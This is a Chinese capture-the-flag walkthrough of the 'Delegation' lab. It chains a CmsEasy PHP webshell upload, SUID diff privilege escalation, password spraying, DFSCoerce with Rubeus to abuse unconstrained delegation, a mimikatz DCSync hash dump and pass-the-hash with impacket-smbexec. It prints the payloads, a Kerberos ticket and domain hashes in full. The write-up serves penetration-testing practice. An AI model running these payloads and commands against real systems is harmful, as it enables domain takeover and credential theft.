春秋云境 Delegation

flag01

1
2
3
4
5
6
39.101.173.163:22 open
39.101.173.163:80 open
39.101.173.163:3306 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.101.173.163 code:200 len:68112 title:中文网页标题

CmsEasy 7.3.8 本地文件包含漏洞 - ListSec

1
2
3
4
5
6
7
8
9
POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.101.173.163
Content-Length: 77
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded;
Cookie: PHPSESSID=os9kli93e59pjclq4361kaairm; loginfalse74c6352c5a281ec5947783b8a186e225=1; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313

sid=#data_d_.._d_.._d_.._d_2.php&slen=693&scontent=<?=eval($_POST["1"]);?>

写入shell之后访问/2.php即可,连接蚁剑

1
find / -perm -u=s -type f 2>/dev/null
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/at
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

diff提权

1
diff --line-format=%L /dev/null /home/flag/flag01.txt

image-20240821002158248

拿到hint

1
WIN19\Adrian

flag02

拿rockyou爆破一波WIN19,先搭建代理,扫描内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.36:21 open
172.22.4.45:139 open
172.22.4.36:80 open
172.22.4.36:3306 open
172.22.4.36:22 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.7:88 open
[*] NetBios: 172.22.4.45 XIAORANG\WIN19
[*] NetInfo:
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetBios: 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetInfo:
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetBios: 172.22.4.7 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetInfo:
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] WebTitle: http://172.22.4.36 code:200 len:68100 title:中文网页标题
[*] WebTitle: http://172.22.4.45 code:200 len:703 title:IIS Windows Server
1
SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:babygirl1 STATUS_PASSWORD_EXPIRED

爆出来这么个东西,有了之前的经验,知道要改密码了

1
proxychains4 rdesktop 172.22.4.45

改完密码rdp上去,在桌面上可以找到一个风险文件

image-20240821004611448

可以修改注册表

image-20240821004914275

修改注册表,然后cmd启动进程,注意这个执行是有时间限制的,比如你执行一个shell,他只有30秒的时间限制,过了这个时间进程也没了

1
sc start gupdate

正向连接上线拿到flag

1
type c:\Users\Administrator\flag\flag02.txt

flag03

查询域内设置了非约束委派的机器账户:

1
AdFind -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

image-20240821011451547

发现有WIN19,并且我们控制的正好是WIN19,且有system权限,那么后面的就很明确了,先让WIN19监听

1
Rubeus.exe monitor /interval:2 /filteruser:DC01$ >hash.txt

利用强认证漏洞强制DC访问WIN19,拿到其TGT票据

1
python dfscoerce.py -u "WIN19$" -hashes :afd9423130654e89e67dc53032d26928 -d xiaorang.lab WIN19 172.22.4.7

强制访问后hash.txt里面就会出现b64的TGT票据,然后导入票据

1
Rubeus.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6KgcRtvscd/DIgXDFIVpBECG+5SBjjdmbEiHmHjAJVi3ZBX6mnDPpfPn5NDZGVO4j0vABRg+aa5U7ZbjceUVDzK24UQK5nE7WJ1YVLHyooOPxpWC2IOAfOGBPmle7HK5JNcyaCaTdASEK04nBwQv1UamoxWNQfOVAZcNKDt3Npg3OOAhHU0HyCdQQXFZkJWs6EnPHGtUm3YGn4rx5NkvjQjCgp2fodDeOyF/cRo4e63hdNA5qvysONb8OnmFdRe0OaH4o4zDNv+aD6Yl45eoAXLLFGe6R3W+9HJetYk/qnQx/GGXPpzhePf24J1xOLWPk3Wv350/AgNYO+/tMU3eGRyfW6sFHOGhZNlWCO5vGgmF9WlGz46+pvZjrFIfMvJ3wQ9U1cUUg9uACgTwARbhNywCWoZg9K7osCmwHM0oKHThVdei1IFPjmRsXBJqMiuhxEcTifAYybrROfvBtA+HPlArE7GFMi6/0EDqzUPEikaUMYuVhGCaG3+S1QeUlNz7T6BML/X7KKQbQUuCjaKy2tFffjetr/41pDQByHT/7hIzNenwrBlwiSiXlF5sPiAq6tVajRmfHpKlTdS9LIygbMaKPSCweJtMrTZVFAOmsyRnWcFgPNacxeCX2htGGdXbA2YNj4rO+kgLWgXz/M0PPMN8GmX5NivuTxXoCmDzarauwrIKFtmFcpAQ/P6L8JP++B3RqyVV2GN9XUXEq6Muf7riTI+IoySRXvqD5pnp0HcHEoeaKjUq24rUbBWTTMQ1SDMaBaKY3rcy79zyKDeYI2v2vhMjRF8lvtNUgW7ix99t0rSCwCSRIwE8mPt3dQAF35HPvMvs0zq253bij2gixCKBLLCHQJHmexBDgggt+GoZwicEUf/QiyZG96YijlyG+odyOCCZ0D927JUpsLK65bhN2IV0oNd3sfjbgwI0ugXfFzTkzrn+qlzd93mW84KeUut5bqsKuc90ymkIqqF9iTGJSlwDqWXOTWOwttcw+/IiMoGJSEctdjZ+6WWSjkhXtXLp5R7QAOJ3zIKyDwnzbCtKmXOAY/tHaUoHHPkEPvWciaf9p1Ap1MKfEGUmp9JsJbveQLfS0SR1hh0xgtDZG6MeMmq1hKGj5V/aeKy5+O4xpJpmrHRTExuJ++aNQbzEQS4xL/cMvRBLwWkLetJRQ3OKr60hPcQPZw43ZTMvAQZc53fGy6aYUSXKD5A6cMEbcEli3QAOl5f8dHm7L40cHcNW2J/nnvcOEdG5cYpg8h7366INTtQeia+gTsI8lFpIuIq6aZkerV3NqX7MD2YHQAD4njpw7Ijhj4wA+3mBCjTOPFRHQI7NwUeLTOw7fEEtK6pT0IsIph6vaEBxQv5H4moKweE2r6eELrooOR8YcxrVA025bSoGH1fxT0nYev5AcYWy+YiM/KAuW80uh2uX8uE7Dwx5GnskjzLUds0iCjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCA7fqNz2H6UReJNgOy2IsNEDG9lAJebzDkz3AJrUqSrm6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI0MDgyMDE2MDIwMVqmERgPMjAyNDA4MjEwMjAyMDFapxEYDzIwMjQwODI3MTYwMjAxWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==

dump哈希

1
mimikatz "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

结果如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt 767e06b9c74fd628dd13785006a9092b 514
1105 Aldrich 98ce19dd5ce74f670d230c7b1aa016d0 512
1106 Marcus b91c7cc463735bf0e599a2d0a04df110 512
1112 WIN-3X7U15C2XDM$ c3ddf0ffd17c48e6c40e6eda9c9fbaf7 4096
1113 WIN-YUUAW2QG9MF$ 125d0e9790105be68deb6002690fc91b 4096
1000 DC01$ 79a05cdbf202947eeb0e56e4f93a806e 532480
500 Administrator 4889f6553239ace1f7c47fa2c619c252 512
1103 FILESERVER$ 5f0f887110fb5c4fd14d34297e8d1dfd 4096
1104 WIN19$ afd9423130654e89e67dc53032d26928 528384

横向19

1
proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/administrator@172.22.4.19 -codec gbk
1
type c:\users\administrator\flag\flag03.txt

flag04

1
proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/administrator@172.22.4.7 -codec gbk
1
type c:\users\Administrator\flag\flag04.txt